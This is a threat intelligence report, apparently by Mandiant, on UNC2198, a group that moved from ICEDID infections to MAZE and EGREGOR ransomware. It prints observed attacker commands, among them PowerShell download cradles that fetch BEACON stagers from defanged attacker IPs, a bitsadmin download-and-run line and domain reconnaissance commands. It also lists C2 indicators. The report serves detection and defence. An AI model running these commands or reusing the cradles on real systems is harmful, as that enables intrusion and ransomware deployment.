So Unchill: Melting UNC2198 ICEDID to Ransomware Operations

Mandiant Advanced Practices (AP) closely tracks the shifting tactics,
techniques, and procedures (TTPs) of financially motivated groups who
severely disrupt organizations with ransomware. In May 2020, FireEye
released a blog
post detailing intrusion tradecraft associated with the deployment
of MAZE
. As of publishing this post, we track 11 distinct groups
that have deployed MAZE ransomware. At the close of 2020, we noticed a
shift in a subset of these groups that have started to deploy EGREGOR
ransomware in favor of MAZE ransomware following access acquired from
ICEDID infections.

Since its discovery in 2017 as a banking trojan, ICEDID evolved into
a pernicious point of entry for financially motivated actors to
conduct intrusion operations. In earlier years, ICEDID was deployed to
primarily target banking credentials. In 2020 we observed adversaries
using ICEDID more explicitly as a tool to enable access to impacted
networks, and in many cases this was leading to the use of common
post-exploitation frameworks and ultimately the deployment of
ransomware. This blog post shines a heat lamp on the latest tradecraft
of UNC2198, who used ICEDID infections to deploy MAZE or
EGREGOR ransomware.

Building an Igloo: ICEDID Infections

Separate phases of intrusions are attributed to different
uncategorized (UNC) groups when discrete operations such as obtaining
access are not part of a contiguous operation. Pure “access
operations” establish remote access into a target environment for
follow on operations actioned by a separate group. A backdoor deployed
to establish an initial foothold for another group is an example of an
access operation.

Between July and December 2020, an ICEDID phishing infection chain
consisted of a multi-stage process involving MOUSEISLAND and
PHOTOLOADER (Figure 1).

So Unchill: Melting UNC2198 ICEDID to Ransomware Operations

Figure 1: Example UNC2420 MOUSEISLAND to
ICEDID Infection Chain

MOUSEISLAND is a Microsoft Word macro downloader used as the first
infection stage and is delivered inside a password-protected zip
attached to a phishing email (Figure 2). Based on our intrusion data
from responding to ICEDID related incidents, the secondary payload
delivered by MOUSEISLAND has been PHOTOLOADER, which acts as an
intermediary downloader to install ICEDID. Mandiant attributes the
MOUSEISLAND distribution of PHOTOLOADER and other payloads to UNC2420,
a distribution threat cluster created by Mandiant’s Threat Pursuit
team. UNC2420 activity shares overlaps with the publicly reported
nomenclature of “Shathak” or “TA551”.



Figure 2: UNC2420 MOUSEISLAND Phishing Email

Ice, Ice, BEACON…UNC2198

Although analysis is always ongoing, at the time of publishing this
blog post, Mandiant tracks multiple distinct threat clusters (UNC
groups) of various sizes that have used ICEDID as a foothold to enable
intrusion operations. The most prominent of these threat clusters is
UNC2198,
a group that has targeted organizations in North America across a
breadth of industries. In at least five cases, UNC2198 acquired
initial access from UNC2420 MOUSEISLAND to conduct intrusion
operations. In 2020, Mandiant attributed nine separate intrusions to
UNC2198. UNC2198’s objective is to monetize their intrusions by
compromising victim networks with ransomware. In July 2020,
Mandiant observed UNC2198 leverage network access provided by an
ICEDID infection to encrypt an environment with MAZE ransomware. As
the year progressed into October and November, we observed UNC2198
shift from deploying MAZE to using EGREGOR ransomware during another
Incident Response engagement. Like MAZE, EGREGOR is operated using an
affiliate
model
, where affiliates who deploy EGREGOR are provided with
proceeds following successful encryption and extortion for payment.

The UNC2198 cluster expanded over the course of more than six
months. Mandiant’s December
2020 blog post on UNCs
described the analytical tradecraft we
use to merge and graduate clusters of activity. Merging UNCs is a
substantial analytical practice in which indicators and tradecraft
attributed to one group are scrutinized against another. Two former
UNCs that shared similar modus operandi were eventually merged into UNC2198.

The Snowball Effect of Attribution

AP created UNC2198 based on a single intrusion in June 2020
involving ICEDID, BEACON, SYSTEMBC and WINDARC. UNC2198 compromised 32
systems in 26 hours during this incident; however, ransomware was not
deployed. Throughout July 2020 we attributed three intrusions to
UNC2198 from Incident Response engagements, including one resulting in
the deployment of MAZE ransomware. In October 2020, a slew of activity
at both Incident Response engagements and Managed Defense clients
resulted in the creation of two new UNC groups, and another incident
attributed to UNC2198.

One of the new UNC groups created in October 2020 was given the
designation UNC2374. UNC2374 began as its own distinct cluster where
BEACON, WINDARC, and SYSTEMBC were observed during an incident at a
Managed Defense customer. Initial similarities in tooling did not
constitute a strong enough link to merge UNC2374 with UNC2198 yet.

Two and a half months following the creation of UNC2374, we amassed
enough data points to merge UNC2374 into UNC2198. Some of the data
points used in merging UNC2374 into UNC2198 include:

  • UNC2198 and UNC2374 Cobalt Strike Team Servers used
    self-signed certificates with the following subject on TCP port
    25055:

C = US, ST = CA, L = California, O = Oracle
Inc, OU = Virtual Services, CN = oracle.com

  • UNC2198 and UNC2374 deployed WINDARC malware to identical file
    paths: %APPDATA%teamviewersmsi.dll
  • The same code signing certificate used to sign an UNC2198 BEACON
    loader was used to sign two UNC2374 SYSTEMBC tunneler payloads.
  • UNC2374 and UNC2198 BEACON C2 servers were accessed by the same
    victim system within a 10-minute time window during intrusion
    operations.

The other UNC group created in October 2020 was given the
designation UNC2414. Three separate intrusions were attributed to
UNC2414, and as the cluster grew, we surfaced similarities between
UNC2414 and UNC2198. A subset of the data points used to merge UNC2414
into UNC2198 include:

  • UNC2198 and UNC2414 BEACON servers used self-signed
    certificates using the following subject on TCP port 25055:

C = US, ST = CA, L = California, O = Oracle
Inc, OU = Virtual Services, CN = oracle.com

  • UNC2198 and UNC2414 installed BEACON as
    C:Windowsint32.dll
  • UNC2198 and UNC2414 installed the
    RCLONE utility as C:Perflogsrclone.exe
  • UNC2198 and
    UNC2414 were proven to be financially motivated actors that had
    leveraged ICEDID as initial access:

    • UNC2198 had deployed
      MAZE
    • UNC2414 had deployed EGREGOR

The merge between UNC2198 and UNC2414 was significant because it
revealed UNC2198 has access to EGREGOR ransomware. The timing of the
EGREGOR usage is also consistent with MAZE ransomware shutting down as
reported
by Mandiant Intelligence. Figure 3 depicts the timeline of related
intrusions and merges into UNC2198.



Figure 3: UNC2198 timeline

UNC2198 Intrusion Flow: After Initial Access

Expanding the UNC2198 cluster through multiple intrusions and merges
with other UNC groups highlights the range of TTPs employed. We have
pulled out some key data from all our UNC2198 intrusions to illustrate
an amalgamation of capabilities used by the threat actor.

Establish Foothold

After obtaining access, UNC2198 has deployed additional malware
using various techniques. For instance, UNC2198 used InnoSetup
droppers to install a WINDARC backdoor on the target host. UNC2198
also used BITS Jobs and remote PowerShell downloads to download
additional tools like SYSTEMBC for proxy and tunneler capabilities.
Example commands for download and execution are:

%COMSPEC% /C echo bitsadmin /transfer 257e
http://<REDACTED>/<REDACTED>.exe
%APPDATA%<REDACTED>.exe &
%APPDATA%<REDACTED>.exe & del %APPDATA%
<REDACTED>.exe ^>
%SYSTEMDRIVE%WINDOWSTempFmpaXUHFennWxPIM.txt >
WINDOWSTempMwUgqKjEDjCMDGmC.bat & %COMSPEC% /C start
%COMSPEC% /C WINDOWSTempMwUgqKjEDjCMDGmC.bat

%COMSPEC% /C echo powershell.exe -nop -w
hidden -c (new-object
System.Net.WebClient).Downloadfile(http://<REDACTED>/<REDACTED>.exe,
<REDACTED>.exe) ^>
%SYSTEMDRIVE%WINDOWSTempAVaNbBXzKyxktAZI.txt >
WINDOWSTempyoKjaqTIzJhdDLjD.bat & %COMSPEC% /C start
%COMSPEC% /C WINDOWSTempyoKjaqTIzJhdDLjD.bat

UNC2198 has used Cobalt Strike BEACON, Metasploit METERPRETER,
KOADIC, and PowerShell EMPIRE
offensive security tools during
this phase as well.

Offensive Security Tooling

UNC2198 has used offensive security tools similarly seen across many
threat actors. UNC2198 has used BEACON in roughly 90% of their
intrusions. UNC2198 installs and executes Cobalt Strike BEACON in a
variety of ways, including shellcode loaders using PowerShell scripts,
service executables, and DLLs. While the ways and means of using
BEACON are not inherently unique, there are still aspects to
extrapolate that shed light on UNC2198 TTPs.

Focusing in on specific BEACON executables tells a different story
beyond the use of the tool itself. Aside from junk code and API calls,
UNC2198 BEACON and METERPRETER executables often exhibit unique
characteristics of malware packaging, including odd command-line
arguments visible within strings and upon execution via child processes:

cmd.exe /c echo TjsfoRdwOe=9931 & reg
add HKCUSOFTWAREWIlumYjNSyHob /v xFCbJrNfgBNqRy /t
REG_DWORD /d 3045 & exit

cmd.exe /c echo ucQhymDRSRvq=1236 & reg
add HKCU\SOFTWARE\YkUJvbgwtylk /v KYIaIoYxqwO /t REG_DWORD
/d 9633 & exit

cmd.exe /c set XlOLqhCejHbSNW=8300 &
reg add HKCUSOFTWAREWaMgGneKhtgTTy /v LbmWADsevLywrkP /t
REG_DWORD /d 3809 & exit

These example commands are non-functional, as they do not modify or
alter payload execution.

Another technique involves installing BEACON using a file path
containing mixed Unicode-escaped and ASCII characters to evade detection:

Unicode Escaped

C:ProgramDataSu0443sHu0435u0430lsTu0430su0441host.exe

Unicode Unescaped

C:ProgramDataSуsHеаlsTаsсhost.exe

The executable was then executed by using a Scheduled Task named
shadowdev
:

cmd.exe /c schtasks /create /sc minute /mo
1 /tn shadowdev /tr
C:\ProgramData\Su0443sHu0435u0430ls\Tu0430su0441host.exe

While the previous examples are related to compiled executables,
UNC2198 has also used simple PowerShell download cradles to execute
Base64-encoded and compressed BEACON stagers in memory:

powershell -nop -w hidden -c IEX
((new-object
net.webclient).downloadstring(‘hxxp://5.149.253[.]199:80/auth’))

powershell.exe -nop -w hidden -c IEX
((new-object
net.webclient).downloadstring(“hxxp://185.106.122[.]167:80/a”))

powershell.exe -nop -w hidden -c “IEX
((new-object
net.webclient).downloadstring(‘hxxp://195.123.233[.]157:80/casino’))”

Discovery and Reconnaissance

UNC2198 has exhibited common TTPs seen across many threat groups
during discovery and reconnaissance activities. UNC2198 has used the
BloodHound active directory mapping utility during intrusions
from within the “C:ProgramData” and “C:Temp” directories.

The following are collective examples of various commands executed
by UNC2198 over time to enumerate a compromised environment:

arp -a
whoami /groups
whoami.exe  /groups /fo csv
whoami /all

net user <Redacted>
net
groups “Domain Admins” /domain
net group
“Enterprise admins” /domain
net group
“local admins” /domain
net localgroup
“administrators” /domain

nltest /domain_trusts
nltest
/dclist:<Redacted>

Lateral Movement and Privilege Escalation

UNC2198 has used Windows Remote Management and RDP to move laterally
between systems. UNC2198 has also performed remote execution of BEACON
service binaries on targeted systems to move laterally. UNC2198
launches SMB BEACON using PowerShell, executing command lines such as
the following:

C:WINDOWSsystem32cmd.exe /b /c start /b
/min powershell -nop -w hidden -encodedcommand
JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALAB
bAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AH
MASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwA3ADIALw…<Truncated>

During one intrusion, UNC2198 used the SOURBITS privilege escalation
utility to execute files on a target system. SOURBITS is a packaged
exploit utility for CVE-2020-0787,
which is a vulnerability that was disclosed in 2020 for Windows
Background Intelligent Transfer Service (BITS)
. SOURBITS
consists of code derived from a GitHub
Repository
that is implemented as a command-line utility, which
can execute arbitrary files with elevated privileges. UNC2198 used
SOURBITS with the following components:

C:Users<User>DownloadsrunsysO.cr
C:Users<User>DownloadsstarterO.exe

The file runsysO.cr is an XOR-encoded PE executable that
exploits CVE-2020-0787, and based on the target system’s bitness, it
will drop one of two embedded SOURBITS payloads.

Data Theft, Ransomware Deployment and #TTR

Like other financially motivated threat actors, part of UNC2198’s
modus operandi in latter stages of intrusions involves the
exfiltration of hundreds of gigabytes of the victim organizations’
data before ransomware is installed. Specifically, UNC2198 has used
RCLONE, a command line utility used to synchronize cloud
storage, to aid in the exfiltration of sensitive data. In all observed
cases of data theft, RCLONE was used by UNC2198 from the
C:PerfLogsrclone.exe” file path.

Time-to-Ransom” (TTR) is the delta between
first-attributed access time and the time of ransomware
deployment. TTR serves as a useful gauge of how quickly an
organization needs to respond to stave off a threat actor’s successful
deployment of ransomware. TTR is not a perfect quantification, as
external factors such as an organization’s security posture can
drastically affect the measurement.

In this post, the TTR of UNC2198 is measured between ICEDID activity
to the deployment of ransomware. In July 2020, UNC2198 deployed MAZE
ransomware using PSEXEC, and the TTR was 5.5 days. In October 2020,
UNC2198 deployed EGREGOR ransomware using forced GPO updates, and the
TTR was 1.5 days.

Looking Forward

Threat actors leveraging access obtained through mass malware
campaigns to deploy ransomware is a growing trend. The efficiency of
ransomware groups places a significant burden on defenders to rapidly
respond before ransomware deployment. As ransomware groups continue to
gain operational expertise through successful compromises, they will
continue to shorten their TTR while scaling their operations.
Understanding the TTPs fundamental to a specific operation like
UNC2198 provides an edge to defenders in their response efforts. Our
unparalleled understanding of groups like UNC2198 is translated into
Mandiant
Advantage
. Accessing our holdings in Mandiant Advantage aids
defenders in recognizing TTPs used by threat actors, assessing
organizational risk, and taking action. Initial investments made into
rapidly assessing a group’s modus operandi pays dividends when they
inevitably evolve and swap out components of their toolset. Whether it
be MAZE or EGREGOR, something icy or hot, Advanced Practices will
continue to pursue these unchill threat actors.

Acknowledgements

Thank you to Dan Perez, Andrew Thompson, Nick Richard, Cian Lynch
and Jeremy Kennelly for technical review of this content. In addition,
thank you to Mandiant frontline responders for harvesting the valuable
intrusion data that enables our research.

Appendix: Malware Families

PHOTOLOADER
is a downloader that has been observed to download ICEDID. It makes an
HTTP request for a fake image file, which is RC4 decrypted to provide
the final payload. Host information is sent to the command and control
(C2) via HTTP cookies. Samples have been observed to contain an
embedded C2 configuration that contain the real C2 with a number of
non-malicious domains. The non-malicious domains are contacted in
addition to the real C2.

WINDARC
is a backdoor that hijacks the execution of TeamViewer to perform C2
communication. It supports plugins and accepts several backdoor
commands. The commands include interacting with the TeamViewer tool,
starting a reverse shell, loading new plugins, downloading and
executing files, and modifying configuration settings.

SYSTEMBC
is a proxy malware that beacons to its C2 and opens new proxy
connections between the C2 and remote hosts as indicated by the C2.
Proxied communications are encrypted with RC4. The malware receives
commands via HTTP and creates new proxy connections as directed.
Underground sales advertisements refer to the software as a “socks5
backconnect system”
. The malware is typically used to hide the
malicious traffic associated with other malware.

Appendix: Detecting the Techniques

FireEye security solutions detect these threats across email,
endpoint, and network levels. The following is a snapshot of existing
detections related to activity outlined in this blog post.

Platform

Detection Name

FireEye Network Security

  • Downloader.Macro.MOUSEISLAND  
  • Downloader.Win.PHOTOLOADER     
  • Trojan.PHOTOLOADER          
  • Downloader.IcedID
  • Trojan.IcedID             
  • Malicious.SSL.IcedID
  • Malicious.SSL.IcedIdCert
  • Trojan.Malicious.Certificate
  • Backdoor.BEACON
  • Trojan.Generic
  • Trojan.CobaltStrike

FireEye Endpoint Security

Real-Time (IOC)

  • BLOODHOUND ATTACK PATH
    MAPPING (UTILITY)
  • BLOODHOUND ATTACK PATH MAPPING A
    (UTILITY)
  • COBALT STRIKE (BACKDOOR)
  • COBALT
    STRIKE DEFAULT DLL EXPORT (BACKDOOR)
  • COBALT STRIKE
    NAMED PIPE ECHO (BACKDOOR)
  • EGREGOR RANSOMWARE
    (FAMILY)
  • ICEDID (FAMILY)
  • MAZE RANSOMWARE
    (FAMILY)
  • MAZE RANSOMWARE A (FAMILY)
  • METASPLOIT SERVICE ABUSE (UTILITY)
  • MOUSEISLAND
    (DOWNLOADER)
  • MOUSEISLAND A (DOWNLOADER)
  • MOUSEISLAND B (DOWNLOADER)
  • POWERSHELL
    DOWNLOADER (METHODOLOGY)
  • POWERSHELL DOWNLOADER D
    (METHODOLOGY)
  • SCHTASK CREATION FROM PROGRAMDATA
    (COLLECTION)
  • SUSPICIOUS BITSADMIN USAGE A
    (METHODOLOGY)
  • SUSPICIOUS POWERSHELL USAGE
    (METHODOLOGY)
  • WMIC SHADOWCOPY DELETE
    (METHODOLOGY)

Malware Protection (AV/MG)

  • SYSTEMBC
  • Trojan.EmotetU.Gen.*
  • Trojan.Mint.Zamg.O
  • Generic.mg.*
  • ICEID
  • Gen:Variant.Razy.*
  • Generic.mg.*
  • BEACON
  • Gen:Trojan.Heur.TP.TGW@bug909di
  • Gen:Variant.Bulz.1217
  • Trojan.GenericKD.34797730
  • Generic.mg.*

Appendix: Indicators

95b78f4d3602aeea4f7a33c9f1b49a97

SYSTEMBC

0378897e4ec1d1ee4637cff110635141

SYSTEMBC

c803200ad4b9f91659e58f0617f0dafa

SYSTEMBC

ad4d445091a3b66af765a1d653fd1eb7

SYSTEMBC

9ecf25b1e9be0b20822fe25269fa5d02

SYSTEMBC

e319f5a8fe496c0c8247e27c3469b20d

SYSTEMBC

a8a7059278d82ce55949168fcd1ddde4

SYSTEMBC

aea530f8a0645419ce0abe1bf2dc1584

SYSTEMBC

3098fbc98e90d91805717d7a4f946c27

SYSTEMBC

45.141.84.212:4132

SYSTEMBC

45.141.84.223:4132

SYSTEMBC

79.141.166.158:4124

SYSTEMBC

149.28.201.253:4114

SYSTEMBC

193.34.167.34:80 

BEACON

195.123.240.219:80

BEACON

23.227.193.167:80

BEACON

5.149.253.199:80 

BEACON

e124cd26fcce258addc85d7f010655ea

BEACON

7ae990c12bf5228b6d1b90d40ad0a79f

BEACON

3eb552ede658ee77ee4631d35eac6b43

BEACON

c188c6145202b65a941c41e7ff2c9afd

BEACON

2f43055df845742d137a18b347f335a5

BEACON

87dc37e0edb39c077c4d4d8f1451402c

ICEDID

1efababd1d6bd869f005f92799113f42

ICEDID

a64e7dd557e7eab3513c9a5f31003e68

ICEDID

9760913fb7948f2983831d71a533a650

ICEDID

14467102f8aa0a0d95d0f3c0ce5f0b59

ICEDID

colombosuede.club

ICEDID

colosssueded.top

ICEDID

golddisco.top

ICEDID

june85.cyou

ICEDID

Appendix: Mandiant Security Validation Actions

Organizations can validate their security controls against more than
60 actions with Mandiant
Security Validation
.

VID

Name

A101-509

Phishing Email – Malicious
Attachment, MOUSEISLAND, Macro Based Downloader

A150-326

Malicious File Transfer –
MOUSEISLAND, Download, Variant #1

A150-433

Malicious File Transfer –
MOUSEISLAND, Download, Variant #2

A101-282

Malicious File Transfer –
MOUSEISLAND Downloader, Download

A104-632

Protected Theater – MOUSEISLAND
Downloader, Execution

A101-266

Command and Control –
MOUSEISLAND, HTTP GET Request for PHOTOLOADER

A101-280

Malicious File Transfer –
PHOTOLOADER, Download

A101-263

Command and Control –
PHOTOLOADER, DNS Query #1

A101-281

Malicious File Transfer – ICEDID
Stage 3, Download

A101-279

Malicious File Transfer – ICEDID
Final Payload, Download

A101-265

Command and Control – ICEDID, DNS
Query #1

A101-264

Command and Control – ICEDID, DNS
Query #2

A101-037

Malicious File Transfer – MAZE,
Download, Variant #1

A101-038

Malicious File Transfer – MAZE,
Download, Variant #2

A101-039

Malicious File Transfer – MAZE,
Download, Variant #3

A101-040

Malicious File Transfer – MAZE,
Download, Variant #4

A101-041

Malicious File Transfer – MAZE,
Download, Variant #5

A101-042

Malicious File Transfer – MAZE,
Download, Variant #6

A101-043

Malicious File Transfer – MAZE,
Download, Variant #7

A101-044

Malicious File Transfer – MAZE,
Download, Variant #8

A101-045

Malicious File Transfer – MAZE,
Download, Variant #9

A100-878

Command and Control – MAZE
Ransomware, C2 Check-in

A101-030

Command and Control – MAZE
Ransomware, C2 Beacon, Variant #1

A101-031

Command and Control – MAZE
Ransomware, C2 Beacon, Variant #2

A101-032

Command and Control – MAZE
Ransomware, C2 Beacon, Variant #3

A104-734

Protected Theater – MAZE, PsExec
Execution

A104-487

Protected Theater – MAZE
Ransomware, Encoded PowerShell Execution

A104-485

Protected Theater – MAZE
Ransomware Execution, Variant #1

A104-486

Protected Theater – MAZE
Ransomware Execution, Variant #2

A104-491

Host CLI – MAZE, Create
Target.lnk

A104-494

Host CLI – MAZE, Dropping
Ransomware Note Burn Directory

A104-495

Host CLI – MAZE, Traversing
Directories and Dropping Ransomware Note, DECRYPT-FILES.html
Variant

A104-496

Host CLI – MAZE, Traversing
Directories and Dropping Ransomware Note, DECRYPT-FILES.txt
Variant

A104-498

Host CLI – MAZE, Desktop
Wallpaper Ransomware Message

A150-668

Malicious File Transfer –
EGREGOR, Download

A101-460

Command and Control – EGREGOR,
GET DLL Payload

A150-675

Protected Theater – EGREGOR,
Execution, Variant #1

A101-271

Malicious File Transfer – BEACON,
Download, Variant #1

A150-610

Malicious File Transfer – BEACON,
Download

A150-609

Command and Control – BEACON,
Check-in

A104-732

Protected Theater – BEACON, Mixed
Unicode-Escaped and ASCII Characters Execution

A101-514

Malicious File Transfer –
WINDARC, Download, Variant #1

A100-072

Malicious File Transfer –
SYSTEMBC Proxy, Download

A100-886

Malicious File Transfer –
Rclone.exe, Download

A100-880

Malicious File Transfer –
Bloodhound Ingestor C Sharp Executable Variant, Download

A100-881

Malicious File Transfer –
Bloodhound Ingestor C Sharp PowerShell Variant, Download

A100-882

Malicious File Transfer –
Bloodhound Ingestor PowerShell Variant, Download

A100-877

Active Directory – BloodHound,
CollectionMethod All

A101-513

Malicious File Transfer –
SOURBITS, Download, Variant #1

A104-733

Protected Theater –
CVE-2020-0787, Arbitrary File Move

A100-353

Command and Control – KOADIC
Agent (mshta)

A100-355

Command and Control – Multiband
Communication using KOADIC

A104-088

Host CLI – Timestomp W/
PowerShell

A104-277

Host CLI – EICAR COM File
Download via PowerShell

A104-281

Host CLI – EICAR TXT File
Download via PowerShell

A104-664

Host CLI – EICAR, Download with
PowerShell

A150-054

Malicious File Transfer – EMPIRE,
Download

A100-327

Command and Control – PowerShell
Empire Agent (http)

A100-328

Lateral Movement, Execution –
PsExec

A100-498

Scanning Activity – TCP Port Scan
for Open RDP

A100-502

Scanning Activity – UDP Port Scan
for Open RDP

A100-316

Lateral Movement – PSSession and
WinRM

A104-081

Host CLI – Mshta

Appendix: UNC2198 MITRE ATT&CK Mapping

ATT&CK Tactic Category

Techniques

Resource Development

Acquire Infrastructure
(T1583)

  • Virtual Private Server
    (T1583.003)

Develop Capabilities (T1587)

  • Digital Certificates (T1587.003)

Obtain
Capabilities (T1588)

  • Code Signing Certificates
    (T1588.003)
  • Digital Certificates (T1588.004)

Initial Access

Phishing (T1566)

  • Spearphishing Attachment (T1566.001)

External Remote Services (T1133)

Valid Accounts
(T1078)

Execution

Command and Scripting Interpreter
(T1059)

  • PowerShell (T1059.001)
  • Visual
    Basic (T1059.005)
  • Windows Command Shell
    (T1059.003)

Scheduled Task/Job (T1053)

  • Scheduled Task (T1053.005)

System Services
(T1569)

  • Service Execution (T1569.002)

User Execution (T1204)

  • Malicious File
    (T1204.002)

Windows Management Instrumentation
(T1047)

Persistence

External Remote Services (T1133)

Scheduled Task/Job (T1053)

  • Scheduled Task
    (T1053.005)

Valid Accounts (T1078)

Privilege Escalation

Process Injection (T1055)

Scheduled Task/Job (T1053)

  • Scheduled Task
    (T1053.005)

Valid Accounts (T1078)

Defense Evasion

Impair Defenses (T1562)

  • Disable or Modify System Firewall (T1562.004)
  • Disable or Modify Tools (T1562.001)

Indicator Removal on Host (T1070)

  • Timestomp
    (T1070.006)

Indirect Command Execution
(T1202)

Modify Registry (T1112)

Obfuscated Files
or Information (T1027)

  • Steganography
    (T1027.003)

Process Injection (T1055)

Signed Binary Proxy Execution (T1218)

  • Mshta
    (T1218.005)

Subvert Trust Controls (T1553)

  • Code Signing (T1553.002)

Valid Accounts
(T1078)

Virtualization/Sandbox Evasion (T1497)

Credential Access

OS Credential Dumping (T1003)

Discovery

Account Discovery (T1087)

  • Local Account (T1087.001)

Domain Trust
Discovery (T1482)

File and Directory Discovery
(T1083)

Permission Groups Discovery (T1069)

System
Information Discovery (T1082)

System Network
Configuration Discovery (T1016)

System Owner/User
Discovery (T1033)

Virtualization/Sandbox Evasion
(T1497)

Lateral Movement

Remote Services (T1021)

  • Remote Desktop Protocol (T1021.001)
  • SMB/Windows
    Admin Shares (T1021.002)
  • SSH (T1021.004)

Collection

Archive Collected Data (T1560)

  • Archive via Utility (T1560.001)

Command and Control

Application Layer Protocol
(T1071)

  • Web Protocols (T1071.001)

Encrypted Channel (T1573)

  • Asymmetric
    Cryptography (T1573.002)

Ingress Tool Transfer
(T1105)

Proxy (T1090)

  • Multi-hop Proxy
    (T1090.003)

By admin